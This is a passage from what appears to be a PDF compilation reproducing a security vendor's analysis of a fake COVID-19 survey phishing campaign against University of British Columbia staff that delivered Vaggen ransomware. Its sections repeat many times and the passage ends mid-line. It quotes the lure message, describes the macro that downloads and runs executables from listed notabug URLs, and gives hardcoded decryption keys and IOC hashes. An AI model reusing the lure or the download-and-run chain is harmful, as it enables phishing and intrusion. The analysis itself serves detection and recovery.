AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1393 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1394 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1395 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1396 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1397 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1398 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1399 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1400 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1401 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1402 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1403 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1404 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1405 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1406 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1407 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1408 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1409 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1410 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1411 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1412 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1413 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1414 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1415 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1416 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1417 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1418 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1419 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1420 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1421 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1422 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1423 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1424 of 